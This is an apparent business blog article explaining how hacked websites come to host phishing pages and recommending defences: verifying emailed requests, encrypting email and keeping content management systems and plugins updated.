With data breaches steadily rising, you’re probably acutely aware that your data is at risk when companies don’t implement high data security standards. What you may not realize is that your own website is at risk of being used by hackers to host phishing scams. While a phishing scam is not the same as a data breach, it can be equally damaging.
In 2018, the Internet Crime Complaint Center (IC3) noted there were 26,379 phishing victims who experienced a combined loss of $48,241,748. What’s alarming is that most of those attacks could have been prevented by a strict IT security policy. Unlike hackers who literally break into servers, phishing attack victims become victims due to human error.
How a phishing scam works on a hacked website
When a hacker gains access to your website (either directly or through a vulnerability in your content management system), they upload fake webpages that mimic the sign-in pages of official websites like online banking, ecommerce, and social media sites.
Next, the hacker emails potential victims with a phony message urging them to log into their account. For example, a hacker might send an email that says, “your online banking account was compromised, please log in promptly to change your password.”
When a victim clicks on the link to change their password, they’re taken to a page that looks just like their online banking login site – except it’s a fake page hosted on your website.
When hackers gain access to your email account, the damage can be worse. They might email people in your company phishing for login information or other bits of sensitive data.
To protect your company against unwittingly hosting a phishing scam, take the following steps immediately.
1. Implement written policies for verifying requests received via email
Encryption will protect stolen data from being read, but employees need to be vigilant about verifying requests for data and money transfers. Your company needs a written policy for verifying requests that come through email. This policy might include calling the CEO or person in charge directly to verify a request for money or data received via email.
It seems like fraudulent requests would be obvious, but even intelligent, educated people get duped. For instance, a real estate mogul’s bookkeeper was recently tricked into wiring $388,000 into a fake bank account in Asia. The cybercriminal sent the bookkeeper correspondence from an email address that was just one letter off from a real company email address. The cybercriminal was able to provide the bookkeeper with details anyone could have obtained by following the real estate mogul’s transactions. However, it seemed legitimate to the bookkeeper. Although it’s hindsight now, the incident could have been prevented by verifying the request with a direct phone call.
Cybercriminals take advantage during tough times
Cybercriminals are currently taking advantage of the coronavirus pandemic by sending out phishing emails that appear to be from the World Health Organization asking for donations and linking to webpages that install malware on the victim’s computer. Make sure employees don’t click on links in unexpected emails even out of curiosity.
2. Integrate email security and encryption into your IT security plan
Is the email security part of your IT security plan? If not, it should be. If you haven’t considered encrypting all company emails end-to-end, it’s worth pursuing. Making encrypted emails part of your IT security plan will ensure that if any emails are hijacked by unauthorized parties, the data contained in the email can’t be read.
You never know when an employee will let their guard down. Encryption is the only way to protect sensitive information your employees need to send over email.
3. Keep your content management system (CMS) up-to-date
Most hackers gain unauthorized access to websites through vulnerabilities in content management systems. If you’re using a platform like WordPress, Joomla, or Magento, make sure to install every update as quickly as possible and keep all of your plugins updated.
If any plugins conflict with your website’s theme, either change your theme or find a new plugin. For security purposes, you should always limit the number of plugins you rely on since developers can stop updating them at any time. Once plugins are no longer updated, they become targets for hackers to gain access to your server.
You may not realize you’re hosting a phishing scheme
The problem with phishing schemes is that you might not realize you’re hosting one for a while. Most people only become aware when their hosting provider shuts down their entire account and sends an email to inform them of consumer complaints.
To avoid unknowingly hosting a phishing scheme, beef up your IT security plan and implement verification protocols for financial and data requests.